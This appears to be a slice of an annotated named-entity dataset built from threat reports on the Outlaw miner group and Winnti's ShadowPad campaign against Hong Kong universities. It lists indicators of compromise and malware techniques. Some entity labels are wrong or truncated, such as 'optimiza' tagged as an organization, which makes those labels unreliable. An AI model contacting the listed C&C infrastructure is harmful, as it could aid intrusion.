{"text": "Meanwhile , the group uses a wide range of IP addresses as input for scanning activities that are grouped by country , allowing them to attack certain regions or areas within particular periods of the year , as previously observed .", "spans": {}, "info": {"id": "aptner_train_001404", "source": "aptner_train"}}
{"text": "We think the group has likely become more enterprising , and learned to take advantage of some details from their previous campaigns to maximize profit opportunities while exerting minimal effort .", "spans": {}, "info": {"id": "aptner_train_001405", "source": "aptner_train"}}
{"text": "By shaping the attack , the group may be able to create niches in the underground , catering to the specific needs of their customers .", "spans": {}, "info": {"id": "aptner_train_001406", "source": "aptner_train"}}
{"text": "Also aware of the existing laws in Europe , they can avoid prosecution in certain countries as long as they avoid attacking them .", "spans": {}, "info": {"id": "aptner_train_001407", "source": "aptner_train"}}
{"text": "Collection of results and data from scanning in this manner might be easier to sort ( while allowing them to stay under the radar ) , as compared to getting feedback from zombie bots deployed around the world simultaneously .", "spans": {}, "info": {"id": "aptner_train_001408", "source": "aptner_train"}}
{"text": "We will continue to monitor this hacking group ’s activities and their toolkit ’s developments .", "spans": {}, "info": {"id": "aptner_train_001409", "source": "aptner_train"}}
{"text": "Outlaw ’s attack routines may not be new , but it still serves as a reminder for enterprises to update their systems regularly .", "spans": {"Organization: Outlaw": [[0, 6]]}, "info": {"id": "aptner_train_001410", "source": "aptner_train"}}
{"text": "Legacy system users may use their providers ’ virtual patches .", "spans": {}, "info": {"id": "aptner_train_001411", "source": "aptner_train"}}
{"text": "Users are advised to close unused ports , to secure ports and other internet-facing devices that are regularly open for system administrators ’ support .", "spans": {}, "info": {"id": "aptner_train_001412", "source": "aptner_train"}}
{"text": "Users can also adopt a multilayered security solution that can protect systems from the gateway to the endpoint , actively blocking malicious URLs by employing filtering , behavioral analysis , and custom sandboxing .", "spans": {}, "info": {"id": "aptner_train_001413", "source": "aptner_train"}}
{"text": "Users can consider adopting security solutions that can defend against malicious bot-related activities such as Outlaw ’s through a cross-generational blend of threat defense techniques .", "spans": {"Organization: Outlaw": [[112, 118]]}, "info": {"id": "aptner_train_001414", "source": "aptner_train"}}
{"text": "Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints , and protect physical , virtual , and cloud workloads .", "spans": {"System: Trend Micro™ XGen™": [[0, 18]]}, "info": {"id": "aptner_train_001415", "source": "aptner_train"}}
{"text": "With technologies that employ web/URL filtering , behavioral analysis , and custom sandboxing , XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities .", "spans": {"System: XGen": [[96, 100]]}, "info": {"id": "aptner_train_001416", "source": "aptner_train"}}
{"text": "A multi-layered connected network defense and complete visibility into all network traffic , in addition to next-generation intrusion prevention system ( NGIPS ) , can help organizations stay a step ahead of threats that could compromise intangible assets .", "spans": {"System: next-generation intrusion prevention system": [[108, 151]], "System: NGIPS": [[154, 159]]}, "info": {"id": "aptner_train_001417", "source": "aptner_train"}}
{"text": "XGen security also powers Trend Micro ’s suite of security solutions : Hybrid Cloud Security and User Protection .", "spans": {"Organization: XGen": [[0, 4]], "Organization: Trend Micro": [[26, 37]]}, "info": {"id": "aptner_train_001418", "source": "aptner_train"}}
{"text": "Outlaw : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa Cryptocurrency miner Trojan.SH.MALXMR.UWEJP .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa": [[9, 73]], "System: Cryptocurrency miner": [[74, 94]], "Malware: Trojan.SH.MALXMR.UWEJP": [[95, 117]]}, "info": {"id": "aptner_train_001419", "source": "aptner_train"}}
{"text": "Outlaw : b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d Shellbot Backdoor.SH.SHELLBOT.AA .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: b68bd3a54622792200b931ee5eebf860acf8b24f4b338b5080193573a81c747d": [[9, 73]], "Malware: Shellbot": [[74, 82]], "Malware: Backdoor.SH.SHELLBOT.AA": [[83, 106]]}, "info": {"id": "aptner_train_001420", "source": "aptner_train"}}
{"text": "Outlaw : 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976 Tool Trojan.Linux.SSHBRUTE.B .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 620635aa9685249c87ead1bb0ad25b096714a0073cfd38a615c5eb63c3761976": [[9, 73]], "Malware: Trojan.Linux.SSHBRUTE.B": [[79, 102]]}, "info": {"id": "aptner_train_001421", "source": "aptner_train"}}
{"text": "Outlaw : fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL32 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: fc57bd66c27066104cd6f8962cd463a5dfc05fa59b76b6958cddd3542dfe6a9a": [[9, 73]], "System: Cryptocurrency miner": [[74, 94]], "Malware: Coinminer.Linux.MALXMR.SMDSL32": [[95, 125]]}, "info": {"id": "aptner_train_001422", "source": "aptner_train"}}
{"text": "Outlaw : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79": [[9, 73]], "System: Cryptocurrency miner": [[74, 94]], "Malware: Coinminer.Linux.MALXMR.SMDSL64": [[95, 125]]}, "info": {"id": "aptner_train_001423", "source": "aptner_train"}}
{"text": "Outlaw : 159.203.141.208 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 159.203.141.208": [[9, 24]]}, "info": {"id": "aptner_train_001424", "source": "aptner_train"}}
{"text": "Outlaw : 104.236.192.6 .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 104.236.192.6": [[9, 22]]}, "info": {"id": "aptner_train_001425", "source": "aptner_train"}}
{"text": "Outlaw : 45.9.148.129:80 Miner pool .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 45.9.148.129:80": [[9, 24]], "System: Miner pool": [[25, 35]]}, "info": {"id": "aptner_train_001426", "source": "aptner_train"}}
{"text": "Outlaw : 45.9.148.125:80 Miner pool .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: 45.9.148.125:80": [[9, 24]], "System: Miner pool": [[25, 35]]}, "info": {"id": "aptner_train_001427", "source": "aptner_train"}}
{"text": "Outlaw : http://www.minpop.com/sk12pack/idents.php Command and control .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: http://www.minpop.com/sk12pack/idents.php": [[9, 50]], "System: Command and control": [[51, 70]]}, "info": {"id": "aptner_train_001428", "source": "aptner_train"}}
{"text": "Outlaw : http://www.minpop.com/sk12pack/names.php Command and control .", "spans": {"Organization: Outlaw": [[0, 6]], "Indicator: http://www.minpop.com/sk12pack/names.php": [[9, 49]], "System: Command and control": [[50, 69]]}, "info": {"id": "aptner_train_001429", "source": "aptner_train"}}
{"text": "Winnti Group targeting universities in Hong Kong .", "spans": {"Organization: Winnti Group": [[0, 12]]}, "info": {"id": "aptner_train_001430", "source": "aptner_train"}}
{"text": "In November 2019 , we discovered a new campaign run by the Winnti Group against two Hong Kong universities .", "spans": {"Organization: Winnti Group": [[59, 71]]}, "info": {"id": "aptner_train_001431", "source": "aptner_train"}}
{"text": "We found a new variant of the ShadowPad backdoor , the group ’s flagship backdoor , deployed using a new launcher and embedding numerous modules .", "spans": {"Malware: ShadowPad backdoor": [[30, 48]], "Malware: backdoor": [[73, 81]]}, "info": {"id": "aptner_train_001432", "source": "aptner_train"}}
{"text": "The Winnti malware was also found at these universities a few weeks prior to ShadowPad .", "spans": {"Malware: The Winnti malware": [[0, 18]], "Malware: ShadowPad": [[77, 86]]}, "info": {"id": "aptner_train_001433", "source": "aptner_train"}}
{"text": "The Winnti Group , active since at least 2012 , is responsible for for high-profile supply-chain attacks against the video game and software industries leading to the distribution of trojanized software ( such as CCleaner , ASUS LiveUpdate and multiple video games ) that is then used to compromise more victims .", "spans": {"Organization: Winnti Group": [[4, 16]], "Malware: trojanized software": [[183, 202]], "System: CCleaner": [[213, 221]], "System: ASUS LiveUpdate": [[224, 239]]}, "info": {"id": "aptner_train_001434", "source": "aptner_train"}}
{"text": "It is also known for having compromised various targets in the healthcare and education sectors .", "spans": {}, "info": {"id": "aptner_train_001435", "source": "aptner_train"}}
{"text": "ESET researchers recently published a white paper updating our understanding of the arsenal of the Winnti Group , following a blog post documenting a supply-chain attack targeting the videogame industry in Asia .", "spans": {"Organization: ESET": [[0, 4]], "Organization: Winnti Group": [[99, 111]]}, "info": {"id": "aptner_train_001436", "source": "aptner_train"}}
{"text": "Additionally , we published a blog post on a new backdoor named skip-2.0 that targets Microsoft SQL Server .", "spans": {"Malware: backdoor": [[49, 57]], "Malware: skip-2.0": [[64, 72]], "System: Microsoft SQL Server": [[86, 106]]}, "info": {"id": "aptner_train_001437", "source": "aptner_train"}}
{"text": "This article focuses on the technical details of this new ShadowPad variant .", "spans": {"Malware: ShadowPad": [[58, 67]]}, "info": {"id": "aptner_train_001438", "source": "aptner_train"}}
{"text": "About the “ Winnti Group ” naming :", "spans": {"Organization: Winnti Group": [[12, 24]]}, "info": {"id": "aptner_train_001439", "source": "aptner_train"}}
{"text": "We have chosen to keep the name “ Winnti Group ” since it ’s the name first used to identify it , in 2013 , by Kaspersky .", "spans": {"Organization: Winnti Group": [[34, 46]], "Organization: Kaspersky": [[111, 120]]}, "info": {"id": "aptner_train_001440", "source": "aptner_train"}}
{"text": "Since Winnti is also a malware family , we always write “ Winnti Group ” when we refer to the malefactors behind the attacks .", "spans": {"Organization: Winnti": [[6, 12]], "Organization: Winnti Group": [[58, 70]]}, "info": {"id": "aptner_train_001441", "source": "aptner_train"}}
{"text": "Since 2013 , it has been demonstrated that Winnti is only one of the many malware families used by the Winnti Group .", "spans": {"Organization: Winnti": [[43, 49]], "Organization: Winnti Group": [[103, 115]]}, "info": {"id": "aptner_train_001442", "source": "aptner_train"}}
{"text": "In November 2019 , ESET ’s machine-learning engine , Augur , detected a malicious and unique sample present on multiple computers belonging to two Hong Kong universities where the Winnti malware had already been found at the end of October .", "spans": {"Organization: ESET": [[19, 23]], "System: Augur": [[53, 58]], "Organization: Winnti": [[180, 186]]}, "info": {"id": "aptner_train_001443", "source": "aptner_train"}}
{"text": "The suspicious sample detected by Augur is actually a new 32-bit ShadowPad launcher .", "spans": {"System: Augur": [[34, 39]], "Malware: ShadowPad": [[65, 74]]}, "info": {"id": "aptner_train_001444", "source": "aptner_train"}}
{"text": "Samples from both ShadowPad and Winnti found at these universities contain campaign identifiers and C&C URLs with the names of the universities , which indicates a targeted attack .", "spans": {"Malware: ShadowPad": [[18, 27]], "Organization: Winnti": [[32, 38]], "System: C&C": [[100, 103]]}, "info": {"id": "aptner_train_001445", "source": "aptner_train"}}
{"text": "In addition to the two compromised universities , thanks to the C&C URL format used by the attackers we have reasons to think that at least three additional Hong Kong universities may have been compromised using these same ShadowPad and Winnti variants .", "spans": {"System: C&C": [[64, 67]], "Malware: ShadowPad": [[223, 232]], "Organization: Winnti": [[237, 243]]}, "info": {"id": "aptner_train_001446", "source": "aptner_train"}}
{"text": "This campaign of the Winnti Group against Hong Kong universities was taking place in the context of Hong Kong facing civic protests that started in June 2019 triggered by an extradition bill .", "spans": {"Organization: Winnti Group": [[21, 33]]}, "info": {"id": "aptner_train_001447", "source": "aptner_train"}}
{"text": "Even though the bill was withdrawn in October 2019 , protests continued , demanding full democracy and investigation of the Hong Kong police .", "spans": {}, "info": {"id": "aptner_train_001448", "source": "aptner_train"}}
{"text": "These protests gathered hundreds of thousands of people in the streets with large support from students of Hong Kong universities , leading to multiple university campus occupations by the protesters .", "spans": {}, "info": {"id": "aptner_train_001449", "source": "aptner_train"}}
{"text": "We have contacted the compromised universities and provided the necessary information and assistance to remediate the compromise .", "spans": {}, "info": {"id": "aptner_train_001450", "source": "aptner_train"}}
{"text": "Unlike previous ShadowPad variants documented in our white paper on the arsenal of the Winnti Group , this launcher is not obfuscated using VMProtect .", "spans": {"Malware: ShadowPad": [[16, 25]], "Organization: Winnti Group": [[87, 99]], "System: VMProtect": [[140, 149]]}, "info": {"id": "aptner_train_001451", "source": "aptner_train"}}
{"text": "Furthermore , the encrypted payload is neither embedded in the overlay nor located in a COM1:NULL.dat alternate data stream .", "spans": {}, "info": {"id": "aptner_train_001452", "source": "aptner_train"}}
{"text": "And the usual RC5 encryption with a key derived from the volume ID of the system drive of the victim machine ( as seen in the PortReuse backdoor , skip-2.0 and some ShadowPad variants ) is not present either .", "spans": {"Malware: PortReuse backdoor": [[126, 144]], "Malware: skip-2.0": [[147, 155]], "Malware: ShadowPad": [[165, 174]]}, "info": {"id": "aptner_train_001453", "source": "aptner_train"}}
{"text": "In this case , the launcher is much simpler .", "spans": {}, "info": {"id": "aptner_train_001454", "source": "aptner_train"}}
{"text": "The launcher is a 32-bit DLL named hpqhvsei.dll , which is the name of a legitimate DLL loaded by hpqhvind.exe .", "spans": {"System: DLL": [[25, 28], [84, 87]], "Indicator: hpqhvsei.dll": [[35, 47]], "Indicator: hpqhvind.exe": [[98, 110]]}, "info": {"id": "aptner_train_001455", "source": "aptner_train"}}
{"text": "This executable is from HP and is usually installed with their printing and scanning software called “ HP Digital Imaging ” .", "spans": {"Organization: HP": [[24, 26]], "System: HP Digital Imaging": [[103, 121]]}, "info": {"id": "aptner_train_001456", "source": "aptner_train"}}
{"text": "In this case the legitimate hpqhvind.exe was dropped by the attackers , along with their malicious hpqhvsei.dll , in C:\\Windows\\Temp .", "spans": {"Indicator: hpqhvind.exe": [[28, 40]], "Indicator: hpqhvsei.dll": [[99, 111]]}, "info": {"id": "aptner_train_001457", "source": "aptner_train"}}
{"text": "Although we do not have the component that dropped and executed this launcher , the presence of these files leads us to think that the initial execution of this launcher is done through DLL side-l .", "spans": {"System: DLL": [[186, 189]], "System: side-l": [[190, 196]]}, "info": {"id": "aptner_train_001458", "source": "aptner_train"}}
{"text": "When the malicious DLL is loaded at hpqhvind.exe startup , its DLLMain function is called that will check its parent process for the following sequence of bytes at offset 0x10BA .", "spans": {"System: DLL": [[19, 22]], "Indicator: hpqhvind.exe": [[36, 48]]}, "info": {"id": "aptner_train_001459", "source": "aptner_train"}}
{"text": "In the case where the parent process is hpqhvind.exe , this sequence of bytes is present at this exact location and the malicious DLL will proceed to patch the parent process in memory .", "spans": {"Indicator: hpqhvind.exe": [[40, 52]], "System: DLL": [[130, 133]]}, "info": {"id": "aptner_train_001460", "source": "aptner_train"}}
{"text": "It replaces the original instructions at 0x10BA with an unconditional jump ( jmp – 0xE9 ) to the address of the function from hpqhvsei.dll that decrypts and executes the encrypted payload embedded in the launcher .", "spans": {"Indicator: hpqhvsei.dll": [[126, 138]]}, "info": {"id": "aptner_train_001461", "source": "aptner_train"}}
{"text": "The decompiled function responsible for patching the parent process .", "spans": {}, "info": {"id": "aptner_train_001462", "source": "aptner_train"}}
{"text": "In case hpqhvsei.dll is loaded by a different process than hpqhvind.exe , the malicious code will not be decrypted and executed .", "spans": {"Indicator: hpqhvsei.dll": [[8, 20]], "Indicator: hpqhvind.exe": [[59, 71]]}, "info": {"id": "aptner_train_001463", "source": "aptner_train"}}
{"text": "The difference between the original and patched hpqhvind.exe .", "spans": {"Indicator: hpqhvind.exe": [[48, 60]]}, "info": {"id": "aptner_train_001464", "source": "aptner_train"}}
{"text": "The part of the code that is patched is located at the very beginning of the main function of hpqhvind.exe .", "spans": {"Indicator: hpqhvind.exe": [[94, 106]]}, "info": {"id": "aptner_train_001465", "source": "aptner_train"}}
{"text": "The patched code is located right after the load of hpqhvsei.dll .", "spans": {"Indicator: hpqhvsei.dll": [[52, 64]]}, "info": {"id": "aptner_train_001466", "source": "aptner_train"}}
{"text": "This means that the function responsible for decrypting and executing the payload is executed directly after the load of the malicious DLL .", "spans": {"System: DLL": [[135, 138]]}, "info": {"id": "aptner_train_001467", "source": "aptner_train"}}
{"text": "The encrypted payload is located in the .rdata section of hpqhvsei.dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration .", "spans": {"Indicator: hpqhvsei.dll": [[58, 70]]}, "info": {"id": "aptner_train_001468", "source": "aptner_train"}}
{"text": "The decrypted payload is the usual shellcode responsible for ShadowPad initialization ( obfuscated using fake conditional jumps to hinder disassembly ) .", "spans": {"System: shellcode": [[35, 44]], "Malware: ShadowPad": [[61, 70]]}, "info": {"id": "aptner_train_001469", "source": "aptner_train"}}
{"text": "After having been decrypted , ShadowPad ’s shellcode is executed .", "spans": {"Malware: ShadowPad": [[30, 39]], "System: shellcode": [[43, 52]]}, "info": {"id": "aptner_train_001470", "source": "aptner_train"}}
{"text": "It will first achieve persistence on the system by writing the in-memory patched parent process to disk to a path specified in the configuration string pool .", "spans": {}, "info": {"id": "aptner_train_001471", "source": "aptner_train"}}
{"text": "In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR.exe .", "spans": {"Indicator: C:\\ProgramData\\DRM\\CLR\\CLR.exe": [[39, 69]]}, "info": {"id": "aptner_train_001472", "source": "aptner_train"}}
{"text": "It then creates a service named clr_optimization_v4.0.30229_32 , which is responsible for executing CLR.exe .", "spans": {"Indicator: CLR.exe": [[100, 107]]}, "info": {"id": "aptner_train_001473", "source": "aptner_train"}}
{"text": "To avoid suspicion , this service name , as well as the executable name , were chosen to look similar to the name of a Microsoft .NET optimiza Service .", "spans": {"System: Microsoft .NET": [[119, 133]], "Organization: optimiza": [[134, 142]]}, "info": {"id": "aptner_train_001474", "source": "aptner_train"}}
{"text": "The numbering on each arrow corresponds to the chronological sequence of events .", "spans": {}, "info": {"id": "aptner_train_001475", "source": "aptner_train"}}
{"text": "ShadowPad is a multimodular backdoor where the modules are referenced from the Root module with a circular list from which one can extract the module address , a UNIX timestamp ( probably embedded automatically during the module ’s compilation process ) and a module identifier .", "spans": {"Malware: ShadowPad": [[0, 9]], "Malware: backdoor": [[28, 36]], "System: UNIX": [[162, 166]]}, "info": {"id": "aptner_train_001476", "source": "aptner_train"}}
{"text": "From the module itself we can also extract the name the developer gave to the module .", "spans": {}, "info": {"id": "aptner_train_001477", "source": "aptner_train"}}
{"text": "This version embeds the 17 modules listed in the following table :", "spans": {}, "info": {"id": "aptner_train_001478", "source": "aptner_train"}}
{"text": "100 Root Thu 24 Oct 2019 12:08:27 PM UTC Initial shellcode . 101 Plugins Thu 24 Oct 2019 12:07:02 PM UTC Provides API for the other modules ; loads modules . 102 Config Thu 24 Oct 2019 12:07:09 PM UTC Handles encrypted configuration string pool . 103 Install Thu 24 Oct 2019 12:07:46 PM UTC Achieves persistence . 104 Online Thu 24 Oct 2019 12:07:17 PM UTC Overall communications with the C&C server . 106 ImpUser Thu 24 Oct 2019 12:07:24 PM UTC User impersonation via token duplication . 200 TCP Thu 24 Oct 2019 12:01:01 PM UTC TCP communications . 202 HTTPS Thu 24 Oct 2019 12:01:15 PM UTC HTTPS communications . 207 Pipe Thu 24 Oct 2019 12:01:35 PM UTC Handles named pipes . 300 Disk Thu 24 Oct 2019 12:02:29 PM UTC File system operations . 301 Process Thu 24 Oct 2019 12:02:36 PM UTC Process handling . 302 Servcie Thu 24 Oct 2019 12:02:45 PM UTC Service handling . 303 Register Thu 24 Oct 2019 12:02:52 PM UTC Registry operations . 304 Shell Thu 24 Oct 2019 12:03:00 PM UTC Command line operations . 306 Keylogger Thu 24 Oct 2019 12:03:16 PM UTC Keylogging to file system . 307 Screen Thu 24 Oct 2019 12:03:25 PM UTC Screenshot capture . 317 RecentFiles Thu 24 Oct 2019 12:04:44 PM UTC Lists recently accessed files .", "spans": {"Indicator: Handles encrypted configuration string pool": [[201, 244]], "System: C&C": [[389, 392]]}, "info": {"id": "aptner_train_001479", "source": "aptner_train"}}
{"text": "These modules , except for RecentFiles , have already been mentioned by Kaspersky and Avast .", "spans": {"Organization: Kaspersky": [[72, 81]], "Organization: Avast": [[86, 91]]}, "info": {"id": "aptner_train_001480", "source": "aptner_train"}}
{"text": "Notice the “ Servcie ” typo .", "spans": {}, "info": {"id": "aptner_train_001481", "source": "aptner_train"}}
{"text": "As usual , all the module timestamps are spread over a short time range , which could suggest the use of a build framework to compile these modules .", "spans": {}, "info": {"id": "aptner_train_001482", "source": "aptner_train"}}
{"text": "This also suggests that these modules were built a few hours before the launcher itself , whose compilation timestamp is Thu Oct 24 14:10:32 2019 .", "spans": {}, "info": {"id": "aptner_train_001483", "source": "aptner_train"}}
{"text": "Since this compilation timestamp dates back two weeks before this campaign , it ’s likely that it has n’t been tampered with by the attackers .", "spans": {}, "info": {"id": "aptner_train_001484", "source": "aptner_train"}}
{"text": "One might also note that the number of modules embedded in this variant is much higher ( 17 ) than the number of modules embedded in the variants previously documented in our white paper ( 8 to 10 modules ) .", "spans": {}, "info": {"id": "aptner_train_001485", "source": "aptner_train"}}
{"text": "By default , every keystroke is recorded using the Keylogger module ( 306, previously documented by Avast ) and saved to disk in the file %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE .", "spans": {"Organization: Avast": [[100, 105]], "Indicator: %APPDATA%\\PAGM\\OEY\\XWWEYG\\WAOUE": [[138, 169]]}, "info": {"id": "aptner_train_001486", "source": "aptner_train"}}
{"text": "The log file is encrypted using the same algorithm as the one used to encrypt static strings from the module .", "spans": {}, "info": {"id": "aptner_train_001487", "source": "aptner_train"}}
{"text": "Using this module by default indicates that the attackers are interested in stealing information from the victims ’ machines .", "spans": {}, "info": {"id": "aptner_train_001488", "source": "aptner_train"}}
{"text": "In contrast , the variants we described in our white paper did n’t even have that module embedded .", "spans": {}, "info": {"id": "aptner_train_001489", "source": "aptner_train"}}
{"text": "As with previous ShadowPad variants , the Config module ( 102 ) contains an encrypted string pool that can be accessed from any other module .", "spans": {"Malware: ShadowPad": [[17, 26]]}, "info": {"id": "aptner_train_001490", "source": "aptner_train"}}
{"text": "The string pool is never stored entirely decrypted in memory ; the field of interest is decrypted when needed and then immediately freed ( thus quickly unavailable ) .", "spans": {}, "info": {"id": "aptner_train_001491", "source": "aptner_train"}}
{"text": "The configuration size is 2180 bytes and the encrypted strings are located at offset 0x84 .", "spans": {}, "info": {"id": "aptner_train_001492", "source": "aptner_train"}}
{"text": "The algorithm used to decrypt the strings is the same as the one used to decrypt the static strings of the module .", "spans": {}, "info": {"id": "aptner_train_001493", "source": "aptner_train"}}
{"text": "The campaign ID is located at offset 0x99 and is the name of the targeted university .", "spans": {}, "info": {"id": "aptner_train_001494", "source": "aptner_train"}}
{"text": "Having a campaign ID related to the target is quite common in the case of ShadowPad and Winnti .", "spans": {"Malware: ShadowPad": [[74, 83]], "Organization: Winnti": [[88, 94]]}, "info": {"id": "aptner_train_001495", "source": "aptner_train"}}
{"text": "Interestingly , the timestamp present in this config at offset 0x84 is later than the modules ’ timestamps and the loader compilation timestamp .", "spans": {}, "info": {"id": "aptner_train_001496", "source": "aptner_train"}}
{"text": "This suggests that this config is added manually to the sample after having been built .", "spans": {}, "info": {"id": "aptner_train_001497", "source": "aptner_train"}}
{"text": "Even though it ’s probably coincidental , the date within the config corresponds to the date of the first detection of this sample at the corresponding university .", "spans": {}, "info": {"id": "aptner_train_001498", "source": "aptner_train"}}
{"text": "Once installed on the system , ShadowPad starts a hidden and suspended Microsoft Windows Media Player wmplayer.exe process and injects itself into that process .", "spans": {"Malware: ShadowPad": [[31, 40]], "System: Microsoft Windows Media Player": [[71, 101]], "Indicator: wmplayer.exe": [[102, 114]]}, "info": {"id": "aptner_train_001499", "source": "aptner_train"}}
{"text": "The path to wmplayer.exe is provided by the Config module .", "spans": {"Indicator: wmplayer.exe": [[12, 24]]}, "info": {"id": "aptner_train_001500", "source": "aptner_train"}}
{"text": "Once ShadowPad is injected into wmplayer.exe , the Online module will contact the C&C server using the URL specified in the configuration .", "spans": {"Malware: ShadowPad": [[5, 14]], "Indicator: wmplayer.exe": [[32, 44]], "System: C&C": [[82, 85]]}, "info": {"id": "aptner_train_001501", "source": "aptner_train"}}
{"text": "The communication is then handled by the TCP module ( 200 ) , which was previously documented by Kaspersky .", "spans": {"Organization: Kaspersky": [[97, 106]]}, "info": {"id": "aptner_train_001502", "source": "aptner_train"}}
{"text": "In addition to ShadowPad , the Winnti malware was found on some machines at these two universities at the end of October ( i.e . two weeks before ShadowPad ) in the file C:\\Windows\\System32\\oci.dll and is detected by ESET products as Win64/Winnti.CA .", "spans": {"Malware: ShadowPad": [[15, 24], [146, 155]], "Organization: Winnti": [[31, 37]], "Indicator: C:\\Windows\\System32\\oci.dll": [[170, 197]], "Organization: ESET": [[217, 221]]}, "info": {"id": "aptner_train_001503", "source": "aptner_train"}}
{"text": "The Winnti malware usually contains a configuration specifying a campaign ID and a C&C URL .", "spans": {"Organization: Winnti": [[4, 10]], "System: C&C": [[83, 86]]}, "info": {"id": "aptner_train_001504", "source": "aptner_train"}}
{"text": "On all machines the campaign ID matches the name of the targeted university and the C&C URLs are :", "spans": {"System: C&C": [[84, 87]]}, "info": {"id": "aptner_train_001505", "source": "aptner_train"}}
{"text": "w[redacted].livehost.live : 443 . w[redacted].dnslookup.services : 443 . where the redacted part corresponds to the name of the targeted university .", "spans": {"Indicator: w[redacted].livehost.live": [[0, 25]], "Indicator: w[redacted].dnslookup.services": [[34, 64]]}, "info": {"id": "aptner_train_001506", "source": "aptner_train"}}
{"text": "One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld : 443 where [backdoor_type] is a single letter which is either “ w ” in the case of the Winnti malware or “ b ” in the case of ShadowPad .", "spans": {"System: C&C": [[25, 28]], "Organization: Winnti": [[46, 52], [218, 224]], "Malware: ShadowPad": [[57, 66], [257, 266]]}, "info": {"id": "aptner_train_001507", "source": "aptner_train"}}
{"text": "From this format , we were able to find several C&C URLs , including three additional Hong Kong universities ’ names .", "spans": {"Indicator: C&C": [[48, 51]]}, "info": {"id": "aptner_train_001508", "source": "aptner_train"}}
{"text": "The campaign identifiers found in the samples we ’ve analyzed match the subdomain part of the C&C server , showing that these samples were really targeted against these universities .", "spans": {"System: C&C": [[94, 97]]}, "info": {"id": "aptner_train_001509", "source": "aptner_train"}}
{"text": "The Winnti Group is still actively using one of its flagship backdoors , ShadowPad , this time against Hong Kong universities .", "spans": {"Organization: Winnti Group": [[4, 16]], "Malware: backdoors": [[61, 70]], "Malware: ShadowPad": [[73, 82]]}, "info": {"id": "aptner_train_001510", "source": "aptner_train"}}
{"text": "In this campaign , the VMProtected launcher used with ShadowPad , as well as with the PortReuse backdoor and skip-2.0 , was replaced by a simpler one .", "spans": {"System: VMProtected": [[23, 34]], "Malware: ShadowPad": [[54, 63]], "Malware: PortReuse backdoor": [[86, 104]], "Malware: skip-2.0": [[109, 117]]}, "info": {"id": "aptner_train_001511", "source": "aptner_train"}}
{"text": "That these samples , in addition to having been found at these universities , contain campaign IDs matching the universities ’ names and use C&C URLs containing the universities ’ names are good indications that this campaign is highly targeted .", "spans": {"System: C&C": [[141, 144]]}, "info": {"id": "aptner_train_001512", "source": "aptner_train"}}
{"text": "We will continue to monitor new activities of the Winnti Group and will publish relevant information on our blog .", "spans": {"Organization: Winnti Group": [[50, 62]]}, "info": {"id": "aptner_train_001513", "source": "aptner_train"}}
{"text": "For any inquiries , contact us at threatintel@eset.com .", "spans": {}, "info": {"id": "aptner_train_001514", "source": "aptner_train"}}
{"text": "The IoCs are also available in our GitHub repository .", "spans": {"Organization: GitHub": [[35, 41]]}, "info": {"id": "aptner_train_001515", "source": "aptner_train"}}
{"text": "ESET detection names : Win32 / Shadowpad.C trojan Win64 / Winnti.CA trojan .", "spans": {"Organization: ESET": [[0, 4]], "System: Win32": [[23, 28]], "Indicator: Shadowpad.C": [[31, 42]], "Malware: trojan": [[43, 49], [68, 74]], "System: Win64": [[50, 55]], "Indicator: Winnti.CA": [[58, 67]]}, "info": {"id": "aptner_train_001516", "source": "aptner_train"}}
{"text": "Winnti : hpqhvsei.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvsei.dll": [[9, 21]]}, "info": {"id": "aptner_train_001517", "source": "aptner_train"}}
{"text": "Winnti : CLR.exe .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: CLR.exe": [[9, 16]]}, "info": {"id": "aptner_train_001518", "source": "aptner_train"}}
{"text": "Winnti : hpqhvsei.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvsei.dll": [[9, 21]]}, "info": {"id": "aptner_train_001519", "source": "aptner_train"}}
{"text": "Winnti : hpqhvind.exe .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvind.exe": [[9, 21]]}, "info": {"id": "aptner_train_001520", "source": "aptner_train"}}
{"text": "Winnti : hpqhvsei.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: hpqhvsei.dll": [[9, 21]]}, "info": {"id": "aptner_train_001521", "source": "aptner_train"}}
{"text": "Winnti : oci.dll .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: oci.dll": [[9, 16]]}, "info": {"id": "aptner_train_001522", "source": "aptner_train"}}
{"text": "Winnti : C&C : b[org_name].dnslookup.services : 443 .", "spans": {"Organization: Winnti": [[0, 6]], "System: C&C": [[9, 12]], "Indicator: b[org_name].dnslookup.services": [[15, 45]]}, "info": {"id": "aptner_train_001523", "source": "aptner_train"}}
{"text": "Winnti : C&C : w[org_name].livehost.live : 443 .", "spans": {"Organization: Winnti": [[0, 6]], "System: C&C": [[9, 12]], "Indicator: w[org_name].livehost.live": [[15, 40]]}, "info": {"id": "aptner_train_001524", "source": "aptner_train"}}
